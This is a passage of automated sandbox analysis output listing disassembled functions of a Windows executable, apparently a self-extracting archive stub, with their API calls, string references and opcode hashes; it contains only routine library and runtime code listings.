                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,C5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00CC17E3
                                              • __freea.LIBCMT ref: 00CC17F0
                                                • Part of subcall function 00CC040E: RtlAllocateHeap.NTDLL(00000000,00CB535E,?,?,00CB6C16,?,?,?,?,?,00CB5269,00CB535E,?,?,?,?), ref: 00CC0440
                                              • __freea.LIBCMT ref: 00CC17F9
                                              • __freea.LIBCMT ref: 00CC181E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                              • String ID:
                                              • API String ID: 1414292761-0
                                              • Opcode ID: 853c5267de763228698e3bf4f91e3770824a68c2d594fef290cd281187b00eb9
                                              • Instruction ID: 60a3e24d4ab680da2edf0dd664d2428d9872d37ab7d4af284cb5a10ec354ce5e
                                              • Opcode Fuzzy Hash: 853c5267de763228698e3bf4f91e3770824a68c2d594fef290cd281187b00eb9
                                              • Instruction Fuzzy Hash: B751CE72600206ABDB259E66CC81FAB76AAEB46750F2D422CFC14D6182EB34DD91D750
                                              Function 00CA7AA3 Relevance: 9.1, APIs: 6, Instructions: 104timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?), ref: 00CA7B06
                                                • Part of subcall function 00CA067E: GetVersionExW.KERNEL32(?), ref: 00CA06AF
                                              • LocalFileTimeToFileTime.KERNEL32(?,?,?,?), ref: 00CA7B2A
                                              • FileTimeToSystemTime.KERNEL32(?,?,?,?), ref: 00CA7B44
                                              • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?,?,?), ref: 00CA7B57
                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 00CA7B67
                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 00CA7B77
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: Time$File$System$Local$SpecificVersion
                                              • String ID:
                                              • API String ID: 2092733347-0
                                              • Opcode ID: c07f27f4ddda9a27a6ec72e531b427b9a128feee8302264611b83cc9627745de
                                              • Instruction ID: ae3c0c0a63ac417ef3d0905850401e5580cccfc9c322dc3c4de8b13df0c2290a
                                              • Opcode Fuzzy Hash: c07f27f4ddda9a27a6ec72e531b427b9a128feee8302264611b83cc9627745de
                                              • Instruction Fuzzy Hash: AE4127761083059BC704DFA9D884A9FB7E8FF98714F04891EF999C7210E730D949CBA6
                                              Function 00CAF33B Relevance: 9.1, APIs: 6, Instructions: 102timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • FileTimeToSystemTime.KERNEL32(?,?,9CAA5719,?,?,?,?,00CCAA27,000000FF), ref: 00CAF38A
                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?,?,?,00CCAA27,000000FF), ref: 00CAF399
                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,00CCAA27,000000FF), ref: 00CAF3A7
                                              • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,00CCAA27,000000FF), ref: 00CAF3B5
                                              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032,?,?,?,?,00CCAA27,000000FF), ref: 00CAF3D0
                                              • GetTimeFormatW.KERNEL32(00000400,?,?,00000000,?,00000032,?,?,?,?,00CCAA27,000000FF), ref: 00CAF3FA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: Time$System$File$Format$DateLocalSpecific
                                              • String ID:
                                              • API String ID: 909090443-0
                                              • Opcode ID: e4525f0a8f8ed2ad98ea65e93a042140b96995bbf26810fd4de62bd40d0188da
                                              • Instruction ID: da2d78c80ff399d6b43473dd4251c5a643ce127e12d8489d4aded9e6aa819704
                                              • Opcode Fuzzy Hash: e4525f0a8f8ed2ad98ea65e93a042140b96995bbf26810fd4de62bd40d0188da
                                              • Instruction Fuzzy Hash: CF3119B2500189AFDB20DFA5DC85FEF77ACFB09700F04412AF90AD6141EB34AA05CB60
                                              Function 00CB977A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetLastError.KERNEL32(?,?,00CB9771,00CB96CC,00CB6A64), ref: 00CB9788
                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00CB9796
                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00CB97AF
                                              • SetLastError.KERNEL32(00000000,00CB9771,00CB96CC,00CB6A64), ref: 00CB9801
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: ErrorLastValue___vcrt_
                                              • String ID:
                                              • API String ID: 3852720340-0
                                              • Opcode ID: 1238cc30a78075520a48b20e42687835419a8b8b94705519922d433a73c6340c
                                              • Instruction ID: a2f48d80c539e2e75cf3b93e9a95efe5f84e63bbcdadf5773889c882592d3fe0
                                              • Opcode Fuzzy Hash: 1238cc30a78075520a48b20e42687835419a8b8b94705519922d433a73c6340c
                                              • Instruction Fuzzy Hash: CE0175365292115E96242FB56CE57EA2B98EB03776F31032AF624651E0EE714C01E145
                                              Function 00CC0005 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetLastError.KERNEL32(?,?,00CBB581,?,00CDE088,?,00CBAE80,?,00CDE088,?,00000007), ref: 00CC0009
                                              • _free.LIBCMT ref: 00CC003C
                                              • _free.LIBCMT ref: 00CC0064
                                              • SetLastError.KERNEL32(00000000,00CDE088,?,00000007), ref: 00CC0071
                                              • SetLastError.KERNEL32(00000000,00CDE088,?,00000007), ref: 00CC007D
                                              • _abort.LIBCMT ref: 00CC0083
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: ErrorLast$_free$_abort
                                              • String ID:
                                              • API String ID: 3160817290-0
                                              • Opcode ID: 021de69bf6129c2f0a8f0438e6361a5b78040e27084a0648f2a1a603b599690e
                                              • Instruction ID: b3c0d302d83a23d351ac71429a55be8a81b18e58c06069f357def3a2050fcdd3
                                              • Opcode Fuzzy Hash: 021de69bf6129c2f0a8f0438e6361a5b78040e27084a0648f2a1a603b599690e
                                              • Instruction Fuzzy Hash: E8F04435144600E7C3227379EC46F6F2A559BD2762F3B012CF929922A2EF758D43A614
                                              Function 00CB3FCF Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON
                                              Download Yara Rule
                                              APIs
                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00CB3FDB
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CB3FF5
                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CB4006
                                              • TranslateMessage.USER32(?), ref: 00CB4010
                                              • DispatchMessageW.USER32(?), ref: 00CB401A
                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00CB4025
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                              • String ID:
                                              • API String ID: 2148572870-0
                                              • Opcode ID: 3c8fc1eaa2e0423edb91d3fafdd2cc2f078e22d6bf3957fad12f241a9227e0fb
                                              • Instruction ID: b4658537507dcdbe28a0432ee0ad25be2976600c17e35a189441e1124997fc58
                                              • Opcode Fuzzy Hash: 3c8fc1eaa2e0423edb91d3fafdd2cc2f078e22d6bf3957fad12f241a9227e0fb
                                              • Instruction Fuzzy Hash: B8F03C72A05129ABCF206BA1EC8CFDF7F6DEF45391F004111F61AE6050E6349641CBA0
                                              Function 00CB2493 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 216windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetDlgItem.USER32(?,00000066), ref: 00CB26A9
                                              • SendMessageW.USER32(00000000,00000143,00000000,00CE5380), ref: 00CB26D6
                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00CB2702
                                              Strings
                                              • ProgramFilesDir, xrefs: 00CB25E0
                                              • Software\Microsoft\Windows\CurrentVersion, xrefs: 00CB25F4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: MessageSend$Item
                                              • String ID: ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                              • API String ID: 3888421826-2634093826
                                              • Opcode ID: 63e9056500e8155dddc0df68d216b4b89d637b98ae4240574d4014ac9a0372a6
                                              • Instruction ID: 659208b693f7031f4d135f2e69b84e3a6a97c9a9eea0720a6ca81ff12d6599be
                                              • Opcode Fuzzy Hash: 63e9056500e8155dddc0df68d216b4b89d637b98ae4240574d4014ac9a0372a6
                                              • Instruction Fuzzy Hash: 26816F31900259DEDF24EBE0C896FEDB7B8AF18310F54019AE945B7191EB705F89EB60
                                              Function 00CADC95 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 122COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: _wcslen$H_prolog3
                                              • String ID: &nbsp;$<br>
                                              • API String ID: 1035939448-26742755
                                              • Opcode ID: fceaa875b130e4f159e83644da07ca6dc22e412ad9f38aef10a4af5130ddad20
                                              • Instruction ID: 940a2c512677c4ce56fc6309ae688ecaea57f3ae319dce683d45de7c5633ff3e
                                              • Opcode Fuzzy Hash: fceaa875b130e4f159e83644da07ca6dc22e412ad9f38aef10a4af5130ddad20
                                              • Instruction Fuzzy Hash: 1D414E30B002169BDB159F50D885B3D7732FB96708F60842DE4139FA81EBB19E82DBE1
                                              Function 00CB3EFC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 00CB3F03
                                              • SetEnvironmentVariableW.KERNEL32(sfxcmd,?,?,?,?,?,?,00000028), ref: 00CB3F1B
                                              • SetEnvironmentVariableW.KERNEL32(sfxpar,?,?,?,?,?,?,?,00000028), ref: 00CB3F86
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: EnvironmentVariable$H_prolog3_
                                              • String ID: sfxcmd$sfxpar
                                              • API String ID: 3605364767-3493335439
                                              • Opcode ID: 1f9b3a18c71ed3b728883f0e42d34891f8542b70a519da5d28fa80ad01bf1c78
                                              • Instruction ID: 289660a1b94723df91ed75f07a2c66c12f9af6f4eb10374a24d67fa617aebe3b
                                              • Opcode Fuzzy Hash: 1f9b3a18c71ed3b728883f0e42d34891f8542b70a519da5d28fa80ad01bf1c78
                                              • Instruction Fuzzy Hash: 2E212270D10208DBCF18DFE8E989AEEB7F9EB09340F50442AF845A7240DB30AA45CB64
                                              Function 00CB07E5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadBitmapW.USER32(00000065), ref: 00CB07F5
                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 00CB081A
                                              • DeleteObject.GDI32(00000000), ref: 00CB084C
                                              • DeleteObject.GDI32(00000000), ref: 00CB086F
                                                • Part of subcall function 00CAEBD3: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00CB0845,00000066), ref: 00CAEBE6
                                                • Part of subcall function 00CAEBD3: SizeofResource.KERNEL32(00000000,?,?,?,00CB0845,00000066), ref: 00CAEBFD
                                                • Part of subcall function 00CAEBD3: LoadResource.KERNEL32(00000000,?,?,?,00CB0845,00000066), ref: 00CAEC14
                                                • Part of subcall function 00CAEBD3: LockResource.KERNEL32(00000000,?,?,?,00CB0845,00000066), ref: 00CAEC23
                                                • Part of subcall function 00CAEBD3: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00CB0845,00000066), ref: 00CAEC3E
                                                • Part of subcall function 00CAEBD3: GlobalLock.KERNEL32(00000000), ref: 00CAEC4F
                                                • Part of subcall function 00CAEBD3: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00CAEC73
                                                • Part of subcall function 00CAEBD3: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00CAECB8
                                                • Part of subcall function 00CAEBD3: GlobalUnlock.KERNEL32(00000000), ref: 00CAECD7
                                                • Part of subcall function 00CAEBD3: GlobalFree.KERNEL32(00000000), ref: 00CAECDE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                              • String ID: ]
                                              • API String ID: 1797374341-3352871620
                                              • Opcode ID: 01315647caad73912e9f618c1d6e5881cbc5568dda9382b52dc9d1abcff90184
                                              • Instruction ID: f135fff30a61e34215e2dafce5020505c9d3b15355bff9530f0d6ce1d106a82c
                                              • Opcode Fuzzy Hash: 01315647caad73912e9f618c1d6e5881cbc5568dda9382b52dc9d1abcff90184
                                              • Instruction Fuzzy Hash: E801F931540216A7D71177A49C49BBF7A79AFC1B59F140124F910AB2D1DF72CE05A6F0
                                              Function 00CBED2F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00CBECE0,00000000,?,00CBEC80,00000000,00CD6F40,0000000C,00CBEDD7,00000000,00000002), ref: 00CBED4F
                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00CBED62
                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00CBECE0,00000000,?,00CBEC80,00000000,00CD6F40,0000000C,00CBEDD7,00000000,00000002), ref: 00CBED85
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AddressFreeHandleLibraryModuleProc
                                              • String ID: CorExitProcess$mscoree.dll
                                              • API String ID: 4061214504-1276376045
                                              • Opcode ID: 79178fc7595671f7f25d770e028a4494064d7c8df95af84694906cd6622d4372
                                              • Instruction ID: 5500fd38ab818cad581cef2ba67677fd99a2cef62f3901875bc674d6da68a485
                                              • Opcode Fuzzy Hash: 79178fc7595671f7f25d770e028a4494064d7c8df95af84694906cd6622d4372
                                              • Instruction Fuzzy Hash: 21F06235A11208FBCB11AFB5DC49FEEBFB5EF08725F400169F809A2250CB704E41CA90
                                              Function 00CA5094 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00CA6C5E: __EH_prolog3_GS.LIBCMT ref: 00CA6C65
                                                • Part of subcall function 00CA6C5E: GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 00CA6C9A
                                              • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00CA50B3
                                              • GetProcAddress.KERNEL32(00CE51F8,CryptUnprotectMemory), ref: 00CA50C3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AddressProc$DirectoryH_prolog3_System
                                              • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                              • API String ID: 270589589-1753850145
                                              • Opcode ID: 2d56c2f418c12741e5df89cdff83c91a7fd0a42b7541b835bb1b39c7b886f8c4
                                              • Instruction ID: db9140157a2790d3d5962b9b680115a461d79e6f3637b55aac98605d24eba944
                                              • Opcode Fuzzy Hash: 2d56c2f418c12741e5df89cdff83c91a7fd0a42b7541b835bb1b39c7b886f8c4
                                              • Instruction Fuzzy Hash: 23E04F70810712DEC7305B74DC88F467ED45F15718F04C82DE4EE93541D6B4E4808B90
                                              Function 00CB985A Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AdjustPointer$_abort
                                              • String ID:
                                              • API String ID: 2252061734-0
                                              • Opcode ID: 3b6a4a8d4c3bda8de3be1da5748de2f66aca1b0cb879d0a0690661b3ab75969e
                                              • Instruction ID: 3d21dd4147ce3a4bd29cb9a472f7ef3558cc466c3c21f72cf707b68c4ba21db1
                                              • Opcode Fuzzy Hash: 3b6a4a8d4c3bda8de3be1da5748de2f66aca1b0cb879d0a0690661b3ab75969e
                                              • Instruction Fuzzy Hash: 5F51F372E01202AFDB698F54C881BFAB7A4FF41310F14452DEE5987291E732EE84DB90
                                              Function 00C9F3BE Relevance: 7.7, APIs: 5, Instructions: 161filetimeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 00C9F3C5
                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,00000050,00C9B749,?,?,?,?,?,?), ref: 00C9F450
                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?), ref: 00C9F4A7
                                              • SetFileTime.KERNEL32(?,?,?,?), ref: 00C9F569
                                              • CloseHandle.KERNEL32(?), ref: 00C9F570
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: File$Create$CloseH_prolog3_HandleTime
                                              • String ID:
                                              • API String ID: 4002707884-0
                                              • Opcode ID: b102d46b962580f431020ee9c0f19cce1981c81f25cb47004ae50647803d1dc3
                                              • Instruction ID: a59d98d5e3440d10f06e7e1da962dc714ed13b14edbace0dfdac2a0c36a901ce
                                              • Opcode Fuzzy Hash: b102d46b962580f431020ee9c0f19cce1981c81f25cb47004ae50647803d1dc3
                                              • Instruction Fuzzy Hash: E7518F70A00249ABEF15DFE8D889BEEBBB5AF49314F24012DF451F7280D7749A46CB24
                                              Function 00CC2BE0 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetEnvironmentStringsW.KERNEL32 ref: 00CC2BE9
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CC2C0C
                                                • Part of subcall function 00CC040E: RtlAllocateHeap.NTDLL(00000000,00CB535E,?,?,00CB6C16,?,?,?,?,?,00CB5269,00CB535E,?,?,?,?), ref: 00CC0440
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00CC2C32
                                              • _free.LIBCMT ref: 00CC2C45
                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00CC2C54
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
